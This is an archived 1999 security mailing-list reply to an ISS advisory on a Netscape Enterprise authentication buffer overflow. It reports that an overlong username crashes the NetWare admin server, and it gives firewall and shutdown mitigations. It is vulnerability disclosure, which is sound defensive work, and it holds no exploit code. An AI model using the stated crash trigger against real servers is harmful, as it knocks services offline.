Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise

From: Brian Eckman (ECKMA009at_private)
Date: Wed Dec 08 1999 - 11:59:16 PST

Next message: Chris Paget: "Re: NT WinLogon VM contains plaintext password visible in admin"

Previous message: Stefan Aeschbacher: "Re: Analysis of trin00"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>Buffer Overflow in Netscape Enterprise and FastTrack Authentication
>Procedure

<<<snip>>>

>Affected Versions:

>This vulnerability affects all supported platforms of Enterprise and
>FastTrack web servers. Enterprise 3.5.1 through 3.6sp2 and FastTrack >3.01
>were found to be vulnerable. Earlier versions may be vulnerable but were >not
>tested by ISS X-Force.

>Description:

>The buffer overflow is present in the HTTP Basic Authentication portion of
>the server. When accessing a password protected portion of the
>Administration or Web server, a username or password that is longer than
>508 characters will cause the server to crash with an access violation
>error. An attacker could utilize the Base64 encoded Authorization string
>to execute arbitrary code as SYSTEM on Windows NT, or as root on Unix.
>Attackers can use these privileges to gain full access to the server.

<<<snip>>>

A similar problem exists in the Enterprise Web Server for NetWare 4.x and 5.x. When a username >310 chars is sent to the Admin Server, the Admin server crashes. Authentication to other password protected areas of the Web Server is not affected.

SPECIFICS:
With the Enterprise Server for NetWare, the admin port on the server will allow a username of any length when authenticating. A username of more than 310 characters will cause the admserv.nlm to crash. The admin port then is not accessable again until the server is rebooted. An attempt to manually unload the nlm caused the server to lock up completely. An attempt to reload the nlm resulted in a message stated the nlm was already loaded.

The offending process (admserv.nlm) does not appear to stop other services running on the server. The Web server continues to function normally, as does the LDAP authentication to other restricted areas. (I only tested restricted subdirectories within the web root)

Regular directories within the Web site that require authentication are not vulnerable. Submitting a long username and/or password (somewhere over 1000 chars, I believe) will result in a message "Your browser sent a message this server could not understand." 

I tested on a 4.11 box with SP7.

Not sure if priviledges can be gained...

FIX:
The Admin server can be turned off when not in use, or block that port with your firewall.

I contacted an engineer at a local Novell office on Dec 2 with no response. Don't see a way on their site to report bugs :(

Brian

Next message: Chris Paget: "Re: NT WinLogon VM contains plaintext password visible in admin"
Previous message: Stefan Aeschbacher: "Re: Analysis of trin00"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:22 PDT